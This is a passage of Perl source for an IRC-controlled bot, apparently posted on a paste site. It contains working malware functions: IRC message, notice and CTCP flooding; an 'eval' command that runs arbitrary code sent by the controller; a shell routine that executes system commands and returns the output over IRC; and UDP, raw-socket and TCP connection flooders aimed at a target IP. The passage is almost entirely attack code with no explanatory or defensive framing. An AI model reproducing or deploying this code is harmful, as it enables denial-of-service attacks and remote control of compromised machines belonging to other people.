  605. sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001PING\001\n");
  606. }
  607. }
  608. ##############
  609. if ($funcarg =~ /^msgflood (.*)/) {
  610. my $target = "$1";
  611. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRCFlood] 9,1MSG Flooding: 12".$target." ");
  612. sendraw($IRC_cur_socket, "PRIVMSG ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
  613. }
  614. ##############
  615. if ($funcarg =~ /^noticeflood (.*)/) {
  616. my $target = "$1";
  617. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRCFlood] 9,1NOTICE Flooding: 12".$target." ");
  618. for (1..2){
  619. sendraw($IRC_cur_socket, "NOTICE ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
  620. }
  621. }
  622. ##############
  623.  
  624. ##############
  625. sub ircase {
  626. my ($kem, $printl, $case) = @_;
  627. if ($case =~ /^join (.*)/) {
  628. j("$1");
  629. }
  630. elsif ($case =~ /^part (.*)/) {
  631. p("$1");
  632. }
  633. elsif ($case =~ /^rejoin\s+(.*)/) {
  634. my $chan = $1;
  635. if ($chan =~ /^(\d+) (.*)/) {
  636. for (my $ca = 1; $ca <= $1; $ca++ ) {
  637. p("$2");
  638. j("$2");
  639. }
  640. } else {
  641. p("$chan");
  642. j("$chan");
  643. }
  644. }
  645. elsif ($case =~ /^op/) {
  646. op("$printl", "$kem") if $case eq "op";
  647. my $oarg = substr($case, 3);
  648. op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  649. }
  650. elsif ($case =~ /^deop/) {
  651. deop("$printl", "$kem") if $case eq "deop";
  652. my $oarg = substr($case, 5);
  653. deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  654. }
  655. elsif ($case =~ /^voice/) {
  656. voice("$printl", "$kem") if $case eq "voice";
  657. $oarg = substr($case, 6);
  658. voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  659. }
  660. elsif ($case =~ /^devoice/) {
  661. devoice("$printl", "$kem") if $case eq "devoice";
  662. $oarg = substr($case, 8);
  663. devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  664. }
  665. elsif ($case =~ /^msg\s+(\S+) (.*)/) {
  666. msg("$1", "$2");
  667. }
  668. elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  669. for (my $cf = 1; $cf <= $1; $cf++) {
  670. msg("$2", "$3");
  671. }
  672. }
  673. elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
  674. ctcp("$1", "$2");
  675. }
  676. elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  677. for (my $cf = 1; $cf <= $1; $cf++) {
  678. ctcp("$2", "$3");
  679. }
  680. }
  681. elsif ($case =~ /^invite\s+(\S+) (.*)/) {
  682. invite("$1", "$2");
  683. }
  684. elsif ($case =~ /^newerver\s+(\S+)\s+(\S+)/) {
  685. conectar("$2", "$1", "6667");
  686. }
  687. elsif ($case =~ /^nick (.*)/) {
  688. nick("$1");
  689. }
  690. elsif ($case =~ /^raw (.*)/) {
  691. sendraw("$1");
  692. }
  693. elsif ($case =~ /^eval (.*)/) {
  694. eval "$1";
  695. }
  696. elsif ($case =~ /^join\s+(\S+)\s+(\d+)/) {
  697. sleep int(rand($2));
  698. j("$1");
  699. }
  700. elsif ($case =~ /^part\s+(\S+)\s+(\d+)/) {
  701. sleep int(rand($2));
  702. p("$1");
  703. }
  704. elsif ($case =~ /^quit/) {
  705. quit();
  706. }
  707. }
  708. ##############
  709. sub shell {
  710. my $printl=$_[0];
  711. my $comando=$_[1];
  712. if ($comando =~ /cd (.*)/) {
  713. chdir("$1") || msg("$printl", "No such file or directory");
  714. return;
  715. } elsif ($pid = fork) {
  716. waitpid($pid, 0);
  717. } else {
  718. if (fork) {
  719. exit;
  720. } else {
  721. my @resp=`$comando 2>&1 3>&1`;
  722. my $c=0;
  723. foreach my $linha (@resp) {
  724. $c++;
  725. chop $linha;
  726. sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  727. if ($c == "$linas_max") {
  728. $c=0;
  729. sleep $sleep;
  730. }
  731. }
  732. exit;
  733. }
  734. }
  735. }
  736. ##############
  737. sub udpflooder {
  738. my $iaddr = inet_aton($_[0]);
  739. my $msg = 'A' x $_[1];
  740. my $ftime = $_[2];
  741. my $cp = 0;
  742. my (%pacotes);
  743. $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  744. socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  745. socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  746. socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  747. socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  748. return(undef) if $cp == 4;
  749. my $itime = time;
  750. my ($cur_time);
  751. while ( 1 ) {
  752. for (my $port = 1;
  753. $port <= 65000; $port++) {
  754. $cur_time = time - $itime;
  755. last if $cur_time >= $ftime;
  756. send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
  757. send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
  758. send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
  759. send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
  760. for (my $pc = 3;
  761. $pc <= 255;$pc++) {
  762. next if $pc == 6;
  763. $cur_time = time - $itime;
  764. last if $cur_time >= $ftime;
  765. socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  766. send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
  767. }
  768. }
  769. last if $cur_time >= $ftime;
  770. }
  771. return($cur_time, %pacotes);
  772. }
  773. ##############
  774. sub tcpflooder {
  775. my $itime = time;
  776. my ($cur_time);
  777. my ($ia,$pa,$proto,$j,$l,$t);
  778. $ia=inet_aton($_[0]);
  779. $pa=sockaddr_in($_[1],$ia);
  780. $ftime=$_[2];
  781. $proto=getprotobyname('tcp');
  782. $j=0;$l=0;
  783. $cur_time = time - $itime;
  784. while ($l<1000){
  785. $cur_time = time - $itime;
  786. last if $cur_time >= $ftime;
  787. $t="SOCK$l";
  788. socket($t,PF_INET,SOCK_STREAM,$proto);
  789. connect($t,$pa)||$j--;
  790. $j++;$l++;
  791. }
  792. $l=0;
  793. while ($l<1000){
  794. $cur_time = time - $itime;
  795. last if $cur_time >= $ftime;
  796. $t="SOCK$l";
  797. shutdown($t,2);
  798. $l++;
  799. }
  800. }
  801. ##############
  802. sub msg {
  803. return unless $#_ == 1;
  804. sendraw("PRIVMSG $_[0] :$_[1]");
  805. }
  806. sub ctcp {
  807. return unless $#_ == 1;
  808. sendraw("PRIVMSG $_[0] :\001$_[1]\001");
  809. }
  810. sub notice {
  811. return unless $#_ == 1;
  812. sendraw("NOTICE $_[0] :$_[1]");
  813. }
  814. sub op {
  815. return unless $#_ == 1;
  816. sendraw("MODE $_[0] +o $_[1]");
  817. }
  818. sub deop {
  819. return unless $#_ == 1;
  820. sendraw("MODE $_[0] -o $_[1]");
  821. }
  822. sub voice {
  823. return unless $#_ == 1;
  824. sendraw("MODE $_[0] +v $_[1]");
  825. }
  826. sub devoice {
  827. return unless $#_ == 1;
  828. sendraw("MODE $_[0] -v $_[1]");
  829. }
  830. sub j { &join(@_); }
  831. sub join {
  832. return unless $#_ == 0;
  833. sendraw("JOIN $_[0]");
  834. }
  835. sub p { part(@_); }
  836. sub part {sendraw("PART $_[0]");}
  837. sub nick {
  838. return unless $#_ == 0;
  839. sendraw("NICK $_[0]");
  840. }
  841. sub quit {
  842. sendraw("QUIT :$_[0]");
  843. exit;
  844. }
  845. sub modo {
  846. return unless $#_ == 0;
  847. sendraw("MODE $_[0] $_[1]");
  848. }
  849. sub mode { modo(@_); }
  850.  
  851. sub invite {
  852. return unless $#_ == 1;
  853. sendraw("INVITE $_[1] $_[0]");
  854. }
  855.  
  856. sub topico {
  857. return unless $#_ == 1;
  858. sendraw("TOPIC $_[0] $_[1]");
  859. }
  860. sub topic { topico(@_); }
  861.  
  862. sub away {
  863. sendraw("AWAY $_[0]");
  864. }
  865. sub back { away(); }
  866.  
  867. }
  868.  
  869. ###################
  870. ##### [ EOF ] #####
  871. ###################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement